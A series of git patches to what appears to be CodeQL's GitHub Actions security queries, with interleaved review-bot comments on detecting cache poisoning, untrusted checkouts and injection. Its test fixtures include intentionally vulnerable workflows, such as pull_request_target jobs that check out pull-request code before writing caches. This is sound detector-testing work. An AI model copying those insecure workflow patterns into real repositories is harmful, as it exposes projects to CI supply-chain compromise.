@@ -18,29 +18,6 @@ import codeql.actions.security.CachePoisoningQuery import codeql.actions.security.PoisonableSteps import codeql.actions.security.ControlChecks -/** - * Holds if the path cache_path is a subpath of the path untrusted_path. - */ -bindingset[cache_path, untrusted_path] -predicate controlledCachePath(string cache_path, string untrusted_path) { - exists(string normalized_cache_path, string normalized_untrusted_path | - ( - cache_path.regexpMatch("^[a-zA-Z0-9_-].*") and - normalized_cache_path = "./" + cache_path.regexpReplaceAll("/$", "") - or - normalized_cache_path = cache_path.regexpReplaceAll("/$", "") - ) and - ( - untrusted_path.regexpMatch("^[a-zA-Z0-9_-].*") and - normalized_untrusted_path = "./" + untrusted_path.regexpReplaceAll("/$", "") - or - normalized_untrusted_path = untrusted_path.regexpReplaceAll("/$", "") - ) and - normalized_cache_path.substring(0, normalized_untrusted_path.length()) = - normalized_untrusted_path - ) -} - query predicate edges(Step a, Step b) { a.getNextStep() = b } from LocalJob job, Event event, Step source, Step step, string message, string path @@ -86,7 +63,7 @@ where step.(CacheWritingStep).getPath() = "?" or // the cache writing step reads from a path the attacker can control - not path = "?" and controlledCachePath(step.(CacheWritingStep).getPath(), path) + not path = "?" and isSubpath(step.(CacheWritingStep).getPath(), path) ) and not step instanceof PoisonableStep select step, source, step, diff --git a/ql/test/query-tests/Security/CWE-349/.github/workflows/direct_cache6.yml b/ql/test/query-tests/Security/CWE-349/.github/workflows/direct_cache6.yml index 5948474d21a..b9652d46b59 100644 --- a/ql/test/query-tests/Security/CWE-349/.github/workflows/direct_cache6.yml +++ b/ql/test/query-tests/Security/CWE-349/.github/workflows/direct_cache6.yml @@ -1,7 +1,7 @@ name: Test on: - issue_comment: + pull_request_target: permissions: actions: write 
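Review bot: In hunk `@@ -86,7 +63,7 @@` the `"?"` sentinel tested by `step.(CacheWritingStep).getPath() = "?"` and `not path = "?"` looks stale after this commit. The checkout `getPath()` overrides now fall back to `GITHUB_WORKSPACE/`, `getStepCWD()` is deleted, and the three `CacheWritingStep` overrides shown in CachePoisoningQuery.qll all return `normalizePath(...)`. If no override outside this diff still produces `"?"`, the first disjunct can never hold and the guard is always true, so both can be dropped, leaving `isSubpath(step.(CacheWritingStep).getPath(), path)`. The `where` clause starts outside the hunk, so the binding of `path` is not visible here.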
@@ -11,6 +11,8 @@ jobs: runs-on: ubuntu-latest steps: - uses: actions/checkout@v4 + with: + ref: ${{ github.event.pull_request.head.sha }} - name: Set up Python 3.10 uses: actions/setup-python@v5 with: @@ -22,14 +24,3 @@ jobs: path: ./results/pip key: ${{ runner.os }}-pip-${{ hashFiles('**/pyproject.toml') }} restore-keys: ${{ runner.os }}-pip- - - name: Download artifact - uses: dawidd6/action-download-artifact@v2 - with: - name: results - path: results/ - - name: Upload results - uses: actions/upload-artifact@v4 - with: - name: results - path: results/ - if-no-files-found: ignore diff --git a/ql/test/query-tests/Security/CWE-349/.github/workflows/neg_direct_cache4.yml b/ql/test/query-tests/Security/CWE-349/.github/workflows/neg_direct_cache4.yml new file mode 100644 index 00000000000..9afe62d69da --- /dev/null +++ b/ql/test/query-tests/Security/CWE-349/.github/workflows/neg_direct_cache4.yml @@ -0,0 +1,23 @@ +on: + issue_comment: + types: [created] + +jobs: + pr-comment: + permissions: read-all + runs-on: ubuntu-latest + steps: + - uses: xt0rted/pull-request-comment-branch@v2 + id: comment-branch + + - uses: actions/checkout@v3 + if: success() + with: + ref: ${{ steps.comment-branch.outputs.head_sha }} + + - uses: actions/cache@v2 + with: + path: ~/.grade/caches/ + key: poison_key + - run: | + cat poison diff --git a/ql/test/query-tests/Security/CWE-349/.github/workflows/neg_direct_cache5.yml b/ql/test/query-tests/Security/CWE-349/.github/workflows/neg_direct_cache5.yml new file mode 100644 index 00000000000..b39bc7a880f --- /dev/null +++ b/ql/test/query-tests/Security/CWE-349/.github/workflows/neg_direct_cache5.yml 
@@ -0,0 +1,23 @@ +on: + issue_comment: + types: [created] + +jobs: + pr-comment: + permissions: read-all + runs-on: ubuntu-latest + steps: + - uses: xt0rted/pull-request-comment-branch@v2 + id: comment-branch + + - uses: actions/checkout@v3 + if: success() + with: + ref: ${{ steps.comment-branch.outputs.head_sha }} + + - uses: actions/cache@v2 + with: + path: /tmp/caches/ + key: poison_key + - run: | + cat poison diff --git a/ql/test/query-tests/Security/CWE-349/CachePoisoningViaDirectCache.expected b/ql/test/query-tests/Security/CWE-349/CachePoisoningViaDirectCache.expected index 8bd69d8f245..f45755adf1d 100644 --- a/ql/test/query-tests/Security/CWE-349/CachePoisoningViaDirectCache.expected +++ b/ql/test/query-tests/Security/CWE-349/CachePoisoningViaDirectCache.expected 
@@ -12,10 +12,8 @@ edges | .github/workflows/direct_cache4.yml:17:9:21:6 | Uses Step | .github/workflows/direct_cache4.yml:21:9:22:21 | Run Step | | .github/workflows/direct_cache5.yml:14:9:17:6 | Uses Step | .github/workflows/direct_cache5.yml:17:9:21:6 | Uses Step | | .github/workflows/direct_cache5.yml:17:9:21:6 | Uses Step | .github/workflows/direct_cache5.yml:21:9:22:21 | Run Step | -| .github/workflows/direct_cache6.yml:13:9:14:6 | Uses Step | .github/workflows/direct_cache6.yml:14:9:18:6 | Uses Step | -| .github/workflows/direct_cache6.yml:14:9:18:6 | Uses Step | .github/workflows/direct_cache6.yml:18:9:25:6 | Uses Step: cache-pip | -| .github/workflows/direct_cache6.yml:18:9:25:6 | Uses Step: cache-pip | .github/workflows/direct_cache6.yml:25:9:30:6 | Uses Step | -| .github/workflows/direct_cache6.yml:25:9:30:6 | Uses Step | .github/workflows/direct_cache6.yml:30:9:35:36 | Uses Step | +| .github/workflows/direct_cache6.yml:13:9:16:6 | Uses Step | .github/workflows/direct_cache6.yml:16:9:20:6 | Uses Step | +| .github/workflows/direct_cache6.yml:16:9:20:6 | Uses Step | .github/workflows/direct_cache6.yml:20:9:26:46 | Uses Step: cache-pip | | .github/workflows/neg_direct_cache1.yml:14:9:17:6 | Uses Step | .github/workflows/neg_direct_cache1.yml:17:9:21:6 | Uses Step | | .github/workflows/neg_direct_cache1.yml:17:9:21:6 | Uses Step | .github/workflows/neg_direct_cache1.yml:21:9:22:21 | Run Step | | .github/workflows/neg_direct_cache2.yml:14:9:17:6 | Uses Step | .github/workflows/neg_direct_cache2.yml:17:9:21:6 | Uses Step | 
@@ -24,6 +22,12 @@ edges | .github/workflows/neg_direct_cache3.yml:14:9:18:6 | Uses Step | .github/workflows/neg_direct_cache3.yml:18:9:25:6 | Uses Step: cache-pip | | .github/workflows/neg_direct_cache3.yml:18:9:25:6 | Uses Step: cache-pip | .github/workflows/neg_direct_cache3.yml:25:9:30:6 | Uses Step | | .github/workflows/neg_direct_cache3.yml:25:9:30:6 | Uses Step | .github/workflows/neg_direct_cache3.yml:30:9:35:36 | Uses Step | +| .github/workflows/neg_direct_cache4.yml:10:9:13:6 | Uses Step: comment-branch | .github/workflows/neg_direct_cache4.yml:13:9:18:6 | Uses Step | +| .github/workflows/neg_direct_cache4.yml:13:9:18:6 | Uses Step | .github/workflows/neg_direct_cache4.yml:18:9:22:6 | Uses Step | +| .github/workflows/neg_direct_cache4.yml:18:9:22:6 | Uses Step | .github/workflows/neg_direct_cache4.yml:22:9:23:21 | Run Step | +| .github/workflows/neg_direct_cache5.yml:10:9:13:6 | Uses Step: comment-branch | .github/workflows/neg_direct_cache5.yml:13:9:18:6 | Uses Step | +| .github/workflows/neg_direct_cache5.yml:13:9:18:6 | Uses Step | .github/workflows/neg_direct_cache5.yml:18:9:22:6 | Uses Step | +| .github/workflows/neg_direct_cache5.yml:18:9:22:6 | Uses Step | .github/workflows/neg_direct_cache5.yml:22:9:23:21 | Run Step | | .github/workflows/neg_poisonable_step1.yml:11:9:14:6 | Uses Step: comment-branch | .github/workflows/neg_poisonable_step1.yml:14:9:19:6 | Uses Step | | .github/workflows/neg_poisonable_step1.yml:14:9:19:6 | Uses Step | .github/workflows/neg_poisonable_step1.yml:19:9:20:30 | Run Step | | .github/workflows/neg_poisonable_step2.yml:13:9:16:6 | Uses Step | .github/workflows/neg_poisonable_step2.yml:16:9:17:54 | Run Step | 
@@ -45,4 +49,4 @@ edges | .github/workflows/direct_cache3.yml:19:9:23:6 | Uses Step | .github/workflows/direct_cache3.yml:14:9:19:6 | Uses Step | .github/workflows/direct_cache3.yml:19:9:23:6 | Uses Step | Potential cache poisoning in the context of the default branch due to privilege checkout of untrusted code. | | .github/workflows/direct_cache4.yml:17:9:21:6 | Uses Step | .github/workflows/direct_cache4.yml:14:9:17:6 | Uses Step | .github/workflows/direct_cache4.yml:17:9:21:6 | Uses Step | Potential cache poisoning in the context of the default branch due to privilege checkout of untrusted code. | | .github/workflows/direct_cache5.yml:17:9:21:6 | Uses Step | .github/workflows/direct_cache5.yml:14:9:17:6 | Uses Step | .github/workflows/direct_cache5.yml:17:9:21:6 | Uses Step | Potential cache poisoning in the context of the default branch due to privilege checkout of untrusted code. | -| .github/workflows/direct_cache6.yml:18:9:25:6 | Uses Step: cache-pip | .github/workflows/direct_cache6.yml:25:9:30:6 | Uses Step | .github/workflows/direct_cache6.yml:18:9:25:6 | Uses Step: cache-pip | Potential cache poisoning in the context of the default branch due to downloading an untrusted artifact. | +| .github/workflows/direct_cache6.yml:20:9:26:46 | Uses Step: cache-pip | .github/workflows/direct_cache6.yml:13:9:16:6 | Uses Step | .github/workflows/direct_cache6.yml:20:9:26:46 | Uses Step: cache-pip | Potential cache poisoning in the context of the default branch due to privilege checkout of untrusted code. | diff --git a/ql/test/query-tests/Security/CWE-349/CachePoisoningViaPoisonableStep.expected b/ql/test/query-tests/Security/CWE-349/CachePoisoningViaPoisonableStep.expected index a515bd87334..cc5ce9bdf87 100644 --- a/ql/test/query-tests/Security/CWE-349/CachePoisoningViaPoisonableStep.expected +++ b/ql/test/query-tests/Security/CWE-349/CachePoisoningViaPoisonableStep.expected 
@@ -12,10 +12,8 @@ edges | .github/workflows/direct_cache4.yml:17:9:21:6 | Uses Step | .github/workflows/direct_cache4.yml:21:9:22:21 | Run Step | | .github/workflows/direct_cache5.yml:14:9:17:6 | Uses Step | .github/workflows/direct_cache5.yml:17:9:21:6 | Uses Step | | .github/workflows/direct_cache5.yml:17:9:21:6 | Uses Step | .github/workflows/direct_cache5.yml:21:9:22:21 | Run Step | -| .github/workflows/direct_cache6.yml:13:9:14:6 | Uses Step | .github/workflows/direct_cache6.yml:14:9:18:6 | Uses Step | -| .github/workflows/direct_cache6.yml:14:9:18:6 | Uses Step | .github/workflows/direct_cache6.yml:18:9:25:6 | Uses Step: cache-pip | -| .github/workflows/direct_cache6.yml:18:9:25:6 | Uses Step: cache-pip | .github/workflows/direct_cache6.yml:25:9:30:6 | Uses Step | -| .github/workflows/direct_cache6.yml:25:9:30:6 | Uses Step | .github/workflows/direct_cache6.yml:30:9:35:36 | Uses Step | +| .github/workflows/direct_cache6.yml:13:9:16:6 | Uses Step | .github/workflows/direct_cache6.yml:16:9:20:6 | Uses Step | +| .github/workflows/direct_cache6.yml:16:9:20:6 | Uses Step | .github/workflows/direct_cache6.yml:20:9:26:46 | Uses Step: cache-pip | | .github/workflows/neg_direct_cache1.yml:14:9:17:6 | Uses Step | .github/workflows/neg_direct_cache1.yml:17:9:21:6 | Uses Step | | .github/workflows/neg_direct_cache1.yml:17:9:21:6 | Uses Step | .github/workflows/neg_direct_cache1.yml:21:9:22:21 | Run Step | | .github/workflows/neg_direct_cache2.yml:14:9:17:6 | Uses Step | .github/workflows/neg_direct_cache2.yml:17:9:21:6 | Uses Step | 
@@ -24,6 +22,12 @@ edges | .github/workflows/neg_direct_cache3.yml:14:9:18:6 | Uses Step | .github/workflows/neg_direct_cache3.yml:18:9:25:6 | Uses Step: cache-pip | | .github/workflows/neg_direct_cache3.yml:18:9:25:6 | Uses Step: cache-pip | .github/workflows/neg_direct_cache3.yml:25:9:30:6 | Uses Step | | .github/workflows/neg_direct_cache3.yml:25:9:30:6 | Uses Step | .github/workflows/neg_direct_cache3.yml:30:9:35:36 | Uses Step | +| .github/workflows/neg_direct_cache4.yml:10:9:13:6 | Uses Step: comment-branch | .github/workflows/neg_direct_cache4.yml:13:9:18:6 | Uses Step | +| .github/workflows/neg_direct_cache4.yml:13:9:18:6 | Uses Step | .github/workflows/neg_direct_cache4.yml:18:9:22:6 | Uses Step | +| .github/workflows/neg_direct_cache4.yml:18:9:22:6 | Uses Step | .github/workflows/neg_direct_cache4.yml:22:9:23:21 | Run Step | +| .github/workflows/neg_direct_cache5.yml:10:9:13:6 | Uses Step: comment-branch | .github/workflows/neg_direct_cache5.yml:13:9:18:6 | Uses Step | +| .github/workflows/neg_direct_cache5.yml:13:9:18:6 | Uses Step | .github/workflows/neg_direct_cache5.yml:18:9:22:6 | Uses Step | +| .github/workflows/neg_direct_cache5.yml:18:9:22:6 | Uses Step | .github/workflows/neg_direct_cache5.yml:22:9:23:21 | Run Step | | .github/workflows/neg_poisonable_step1.yml:11:9:14:6 | Uses Step: comment-branch | .github/workflows/neg_poisonable_step1.yml:14:9:19:6 | Uses Step | | .github/workflows/neg_poisonable_step1.yml:14:9:19:6 | Uses Step | .github/workflows/neg_poisonable_step1.yml:19:9:20:30 | Run Step | | .github/workflows/neg_poisonable_step2.yml:13:9:16:6 | Uses Step | .github/workflows/neg_poisonable_step2.yml:16:9:17:54 | Run Step | From 1a5a3044c2447e3a58454eba41a134e786d51321 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Fri, 27 Sep 2024 18:25:31 +0200 Subject: [PATCH 0546/1267] Bump qlpack versions --- ql/lib/qlpack.yml | 2 +- ql/src/qlpack.yml | 2 +- 2 files changed, 2 insertions(+), 2 deletions(-) 
diff --git a/ql/lib/qlpack.yml b/ql/lib/qlpack.yml index 8447d10d94b..a453e0c9612 100644 --- a/ql/lib/qlpack.yml +++ b/ql/lib/qlpack.yml @@ -2,7 +2,7 @@ library: true warnOnImplicitThis: true name: github/actions-all -version: 0.1.56 +version: 0.1.57 dependencies: codeql/util: ^1.0.1 codeql/yaml: ^1.0.1 diff --git a/ql/src/qlpack.yml b/ql/src/qlpack.yml index b167a960886..b90f38e4b1a 100644 --- a/ql/src/qlpack.yml +++ b/ql/src/qlpack.yml @@ -1,7 +1,7 @@ --- library: false name: github/actions-queries -version: 0.1.56 +version: 0.1.57 groups: [actions, queries] suites: codeql-suites extractor: javascript From 4fffde2fc58962940f4389aab1635b7ce1d6e352 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Fri, 27 Sep 2024 21:38:38 +0200 Subject: [PATCH 0547/1267] Add remote flow sources as a mutable ref source for untrusted checkouts --- .../actions/security/UntrustedCheckoutQuery.qll | 12 ++++++++++++ .../CWE-829/UntrustedCheckoutCritical.expected | 4 ++++ 2 files changed, 16 insertions(+) diff --git a/ql/lib/codeql/actions/security/UntrustedCheckoutQuery.qll b/ql/lib/codeql/actions/security/UntrustedCheckoutQuery.qll index 100a9c5dd5d..a3ea6be06fc 100644 --- a/ql/lib/codeql/actions/security/UntrustedCheckoutQuery.qll +++ b/ql/lib/codeql/actions/security/UntrustedCheckoutQuery.qll @@ -1,5 +1,6 @@ import actions private import codeql.actions.DataFlow +private import codeql.actions.dataflow.FlowSources private import codeql.actions.TaintTracking /** 
@@ -8,6 +9,17 @@ private import codeql.actions.TaintTracking */ private module ActionsMutableRefCheckoutConfig implements DataFlow::ConfigSig { predicate isSource(DataFlow::Node source) { + // remote flow sources + source instanceof ArtifactSource + or + source instanceof GitHubCtxSource + or + source instanceof GitHubEventCtxSource + or + source instanceof GitHubEventJsonSource + or + source instanceof MaDSource + or // `ref` argument contains the PR id/number or head ref exists(Expression e | source.asExpr() = e and diff --git a/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutCritical.expected b/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutCritical.expected index 9358d65e8f4..4dc2b53e591 100644 --- a/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutCritical.expected +++ b/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutCritical.expected 
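Review bot: `isSource` now lists five source classes by name (`ArtifactSource`, `GitHubCtxSource`, `GitHubEventCtxSource`, `GitHubEventJsonSource`, `MaDSource`), so a source class added to FlowSources.qll later will silently not count for the mutable-ref checkout configuration. If FlowSources.qll exposes a common supertype for these, a single `source instanceof` test against it would keep the two in step; otherwise a comment such as `// keep in sync with the source classes in FlowSources.qll` belongs above the list. The module's QLDoc starts outside the hunk and may need updating to say that any remote flow source reaching the checkout `ref`, not only a PR head reference, now counts. The predicate body continues past the hunk.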
@@ -266,6 +266,10 @@ edges #select | .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/reusable.yml:26:9:29:7 | Run Step | .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/reusable.yml:23:9:26:6 | Uses Step | .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/reusable.yml:26:9:29:7 | Run Step | Execution of untrusted code on a privileged workflow. $@ | .github/workflows/reusable_caller1.yaml:4:3:4:21 | pull_request_target | .github/workflows/reusable_caller1.yaml | | .github/workflows/actor_trusted_checkout.yml:15:7:19:4 | Run Step | .github/workflows/actor_trusted_checkout.yml:9:7:14:4 | Uses Step | .github/workflows/actor_trusted_checkout.yml:15:7:19:4 | Run Step | Execution of untrusted code on a privileged workflow. $@ | .github/workflows/actor_trusted_checkout.yml:2:3:2:21 | pull_request_target | .github/workflows/actor_trusted_checkout.yml | +| .github/workflows/artifactpoisoning91.yml:28:9:29:6 | Uses Step | .github/workflows/artifactpoisoning91.yml:25:9:28:6 | Uses Step | .github/workflows/artifactpoisoning91.yml:28:9:29:6 | Uses Step | Execution of untrusted code on a privileged workflow. $@ | .github/workflows/artifactpoisoning91.yml:3:3:3:14 | workflow_run | .github/workflows/artifactpoisoning91.yml | +| .github/workflows/artifactpoisoning91.yml:29:9:29:27 | Run Step | .github/workflows/artifactpoisoning91.yml:25:9:28:6 | Uses Step | .github/workflows/artifactpoisoning91.yml:29:9:29:27 | Run Step | Execution of untrusted code on a privileged workflow. $@ | .github/workflows/artifactpoisoning91.yml:3:3:3:14 | workflow_run | .github/workflows/artifactpoisoning91.yml | +| .github/workflows/artifactpoisoning92.yml:28:9:29:6 | Uses Step | .github/workflows/artifactpoisoning92.yml:25:9:28:6 | Uses Step | .github/workflows/artifactpoisoning92.yml:28:9:29:6 | Uses Step | Execution of untrusted code on a privileged workflow. 
$@ | .github/workflows/artifactpoisoning92.yml:3:3:3:14 | workflow_run | .github/workflows/artifactpoisoning92.yml | +| .github/workflows/artifactpoisoning92.yml:29:9:29:27 | Run Step | .github/workflows/artifactpoisoning92.yml:25:9:28:6 | Uses Step | .github/workflows/artifactpoisoning92.yml:29:9:29:27 | Run Step | Execution of untrusted code on a privileged workflow. $@ | .github/workflows/artifactpoisoning92.yml:3:3:3:14 | workflow_run | .github/workflows/artifactpoisoning92.yml | | .github/workflows/auto_ci.yml:32:9:37:6 | Run Step | .github/workflows/auto_ci.yml:20:9:27:6 | Uses Step | .github/workflows/auto_ci.yml:32:9:37:6 | Run Step | Execution of untrusted code on a privileged workflow. $@ | .github/workflows/auto_ci.yml:6:3:6:21 | pull_request_target | .github/workflows/auto_ci.yml | | .github/workflows/auto_ci.yml:48:9:52:2 | Run Step | .github/workflows/auto_ci.yml:20:9:27:6 | Uses Step | .github/workflows/auto_ci.yml:48:9:52:2 | Run Step | Execution of untrusted code on a privileged workflow. $@ | .github/workflows/auto_ci.yml:6:3:6:21 | pull_request_target | .github/workflows/auto_ci.yml | | .github/workflows/auto_ci.yml:79:9:84:6 | Run Step | .github/workflows/auto_ci.yml:67:9:74:6 | Uses Step | .github/workflows/auto_ci.yml:79:9:84:6 | Run Step | Execution of untrusted code on a privileged workflow. $@ | .github/workflows/auto_ci.yml:6:3:6:21 | pull_request_target | .github/workflows/auto_ci.yml | From 1b3b47bb1edfa5704b0e5538db4395112a43786e Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Fri, 27 Sep 2024 21:39:51 +0200 Subject: [PATCH 0548/1267] Bump qlpack versions --- ql/lib/qlpack.yml | 2 +- ql/src/qlpack.yml | 2 +- 2 files changed, 2 insertions(+), 2 deletions(-) diff --git a/ql/lib/qlpack.yml b/ql/lib/qlpack.yml index a453e0c9612..6f57c4554d0 100644 --- a/ql/lib/qlpack.yml +++ b/ql/lib/qlpack.yml 
@@ -2,7 +2,7 @@ library: true warnOnImplicitThis: true name: github/actions-all -version: 0.1.57 +version: 0.1.58 dependencies: codeql/util: ^1.0.1 codeql/yaml: ^1.0.1 diff --git a/ql/src/qlpack.yml b/ql/src/qlpack.yml index b90f38e4b1a..d3b65425c41 100644 --- a/ql/src/qlpack.yml +++ b/ql/src/qlpack.yml @@ -1,7 +1,7 @@ --- library: false name: github/actions-queries -version: 0.1.57 +version: 0.1.58 groups: [actions, queries] suites: codeql-suites extractor: javascript From f2c5a14883fb0ebc859f4dabd73051c8245eba37 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Sat, 28 Sep 2024 23:57:32 +0200 Subject: [PATCH 0549/1267] Fix: ControlChecks protects/dominates only work with Steps. A sink can be in a sub-step node (eg: ScalarValue) --- ql/lib/codeql/actions/Ast.qll | 2 + ql/lib/codeql/actions/ast/internal/Ast.qll | 12 ++ .../codeql/actions/security/ControlChecks.qll | 22 +- .../CWE-077/EnvVarInjectionCritical.ql | 11 +- .../CWE-078/CommandInjectionCritical.ql | 6 +- .../CWE-077/.github/workflows/test11.yml | 81 ++++++++ .../CWE-077/.github/workflows/test12.yml | 80 +++++++ .../CWE-077/EnvVarInjectionCritical.expected | 19 ++ .../CWE-077/EnvVarInjectionMedium.expected | 16 ++ .../actions/run-airbyte-ci/action.yaml | 196 ++++++++++++++++++ .../CWE-078/.github/workflows/test1.yml | 63 ++++++ .../CWE-078/CommandInjectionCritical.expected | 7 + .../CWE-078/CommandInjectionMedium.expected | 9 + 13 files changed, 507 insertions(+), 17 deletions(-) create mode 100644 ql/test/query-tests/Security/CWE-077/.github/workflows/test11.yml create mode 100644 ql/test/query-tests/Security/CWE-077/.github/workflows/test12.yml create mode 100644 ql/test/query-tests/Security/CWE-078/.github/actions/run-airbyte-ci/action.yaml create mode 100644 ql/test/query-tests/Security/CWE-078/.github/workflows/test1.yml diff --git a/ql/lib/codeql/actions/Ast.qll b/ql/lib/codeql/actions/Ast.qll index 17b0dab4ee6..63f2552f582 100644 --- a/ql/lib/codeql/actions/Ast.qll 
+++ b/ql/lib/codeql/actions/Ast.qll @@ -13,6 +13,8 @@ class AstNode instanceof AstNodeImpl { string toString() { result = super.toString() } + Step getEnclosingStep() { result = super.getEnclosingStep() } + Job getEnclosingJob() { result = super.getEnclosingJob() } Workflow getEnclosingWorkflow() { result = super.getEnclosingWorkflow() } diff --git a/ql/lib/codeql/actions/ast/internal/Ast.qll b/ql/lib/codeql/actions/ast/internal/Ast.qll index 5361943331b..d4716f89e19 100644 --- a/ql/lib/codeql/actions/ast/internal/Ast.qll +++ b/ql/lib/codeql/actions/ast/internal/Ast.qll @@ -110,6 +110,18 @@ abstract class AstNodeImpl extends TAstNode { result = this.getEnclosingCompositeAction().getACallerJob() } + /** + * Gets the enclosing Step. + */ + StepImpl getEnclosingStep() { + if this instanceof StepImpl + then result = this + else + if this instanceof ScalarValueImpl + then result.getAChildNode*() = this.getParentNode() + else none() + } + /** * Gets the enclosing workflow if any. */ diff --git a/ql/lib/codeql/actions/security/ControlChecks.qll b/ql/lib/codeql/actions/security/ControlChecks.qll index 052b22cd338..b9410f0fcb0 100644 --- a/ql/lib/codeql/actions/security/ControlChecks.qll +++ b/ql/lib/codeql/actions/security/ControlChecks.qll 
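Review bot: `getEnclosingStep()` in `internal/Ast.qll` has no result for a node that is neither a `StepImpl` nor a `ScalarValueImpl`, and the QLDoc `Gets the enclosing Step.` does not say so. `ControlCheck.dominates` in this same commit relies on it for the step-level `if` and preceding-step disjuncts, so for other node kinds those disjuncts never hold and only job-level checks are considered. If the restriction is not needed, the inner branch can apply the same lookup to every non-step node, `else result.getAChildNode*() = this.getParentNode()`. Otherwise extend the doc to `Gets the enclosing Step, if this node is a step or a scalar value inside one.`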
@@ -37,29 +37,29 @@ abstract class ControlCheck extends AstNode { this instanceof Run } - predicate protects(Step step, Event event, string category) { + predicate protects(AstNode node, Event event, string category) { // The check dominates the step it should protect - this.dominates(step) and + this.dominates(node) and // The check is effective against the event and category this.protectsCategoryAndEvent(category, event.getName()) and // The check can be triggered by the event this.getEnclosingJob().getATriggerEvent() = event } - predicate dominates(Step step) { + predicate dominates(AstNode node) { this instanceof If and ( - step.getIf() = this or - step.getEnclosingJob().getIf() = this or - step.getEnclosingJob().getANeededJob().(LocalJob).getAStep().getIf() = this or - step.getEnclosingJob().getANeededJob().(LocalJob).getIf() = this + node.getEnclosingStep().getIf() = this or + node.getEnclosingJob().getIf() = this or + node.getEnclosingJob().getANeededJob().(LocalJob).getAStep().getIf() = this or + node.getEnclosingJob().getANeededJob().(LocalJob).getIf() = this ) or this instanceof Environment and ( - step.getEnclosingJob().getEnvironment() = this + node.getEnclosingJob().getEnvironment() = this or - step.getEnclosingJob().getANeededJob().getEnvironment() = this + node.getEnclosingJob().getANeededJob().getEnvironment() = this ) or ( @@ -67,9 +67,9 @@ abstract class ControlCheck extends AstNode { this instanceof UsesStep ) and ( - this.(Step).getAFollowingStep() = step + this.(Step).getAFollowingStep() = node.getEnclosingStep() or - step.getEnclosingJob().getANeededJob().(LocalJob).getAStep() = this.(Step) + node.getEnclosingJob().getANeededJob().(LocalJob).getAStep() = this.(Step) ) } diff --git a/ql/src/Security/CWE-077/EnvVarInjectionCritical.ql b/ql/src/Security/CWE-077/EnvVarInjectionCritical.ql index b301915d79c..ad97dd3caef 100644 --- a/ql/src/Security/CWE-077/EnvVarInjectionCritical.ql +++ b/ql/src/Security/CWE-077/EnvVarInjectionCritical.ql 
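Review bot: In `dominates`, the disjunct `node.getEnclosingJob().getANeededJob().(LocalJob).getAStep().getIf() = this` treats an `if:` on a single step of a needed job as guarding every node in the dependent job. A step whose `if:` evaluates to false is skipped without failing its job, so the dependent job still runs and the node is not actually gated; as far as these lines show, this may suppress alerts that should be reported. Consider dropping that disjunct, or keeping it with a comment such as `// heuristic: a step-level if in a needed job does not stop dependent jobs from running`. The comment `// The check dominates the step it should protect` in `protects` is also stale now that the parameter is an `AstNode`. The `ControlCheck` class continues outside both hunks.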
@@ -22,19 +22,20 @@ from EnvVarInjectionFlow::PathNode source, EnvVarInjectionFlow::PathNode sink, E where EnvVarInjectionFlow::flowPath(source, sink) and inPrivilegedContext(sink.getNode().asExpr(), event) and - not exists(ControlCheck check | - check.protects(sink.getNode().asExpr(), event, "envvar-injection") - ) and // exclude paths to file read sinks from non-artifact sources ( + // source is text not source.getNode().(RemoteFlowSource).getSourceType() = "artifact" and not exists(ControlCheck check | - check.protects(sink.getNode().asExpr(), event, "code-injection") + check.protects(sink.getNode().asExpr(), event, ["envvar-injection", "code-injection"]) ) or + // source is an artifact or a file from an untrusted checkout source.getNode().(RemoteFlowSource).getSourceType() = "artifact" and not exists(ControlCheck check | - check.protects(sink.getNode().asExpr(), event, ["untrusted-checkout", "artifact-poisoning"]) + check + .protects(sink.getNode().asExpr(), event, + ["envvar-injection", "untrusted-checkout", "artifact-poisoning"]) ) and ( sink.getNode() instanceof EnvVarInjectionFromFileReadSink or diff --git a/ql/src/Security/CWE-078/CommandInjectionCritical.ql b/ql/src/Security/CWE-078/CommandInjectionCritical.ql index 80281e8db30..c3d6fa74f6c 100644 --- a/ql/src/Security/CWE-078/CommandInjectionCritical.ql +++ b/ql/src/Security/CWE-078/CommandInjectionCritical.ql 
@@ -16,11 +16,15 @@ import actions import codeql.actions.security.CommandInjectionQuery import CommandInjectionFlow::PathGraph +import codeql.actions.security.ControlChecks from CommandInjectionFlow::PathNode source, CommandInjectionFlow::PathNode sink, Event event where CommandInjectionFlow::flowPath(source, sink) and - inPrivilegedContext(sink.getNode().asExpr(), event) + inPrivilegedContext(sink.getNode().asExpr(), event) and + not exists(ControlCheck check | + check.protects(sink.getNode().asExpr(), event, ["command-injection", "code-injection"]) + ) select sink.getNode(), source, sink, "Potential command injection in $@, which may be controlled by an external user.", sink, sink.getNode().asExpr().(Expression).getRawExpression() diff --git a/ql/test/query-tests/Security/CWE-077/.github/workflows/test11.yml b/ql/test/query-tests/Security/CWE-077/.github/workflows/test11.yml new file mode 100644 index 00000000000..2c2480f5353 --- /dev/null +++ b/ql/test/query-tests/Security/CWE-077/.github/workflows/test11.yml 
@@ -0,0 +1,81 @@ +name: Write prerelease comment + +on: + workflow_run: + workflows: ["Create Pull Request Prerelease"] + types: + - completed + +jobs: + comment: + if: ${{ github.repository_owner == 'cloudflare' }} + runs-on: ubuntu-latest + name: Write comment to the PR + steps: + - name: "Put PR and workflow ID on the environment" + uses: actions/github-script@v7 + with: + script: | + // Copied from .github/extract-pr-and-workflow-id.js + const allArtifacts = await github.rest.actions.listWorkflowRunArtifacts({ + owner: context.repo.owner, + repo: context.repo.repo, + run_id: context.payload.workflow_run.id, + }); + + for (const artifact of allArtifacts.data.artifacts) { + // Extract the PR number from the artifact name + const match = /^npm-package-(.+)-(\d+)$/.exec(artifact.name); + if (match) { + const packageName = match[1].toUpperCase(); + require("fs").appendFileSync( + process.env.GITHUB_ENV, + `\nWORKFLOW_RUN_PR_FOR_${packageName}=${match[2]}` + + `\nWORKFLOW_RUN_ID_FOR_${packageName}=${context.payload.workflow_run.id}` + ); + } + } + + - name: "Download runtime versions" + # Regular `actions/download-artifact` doesn't support downloading + # artifacts 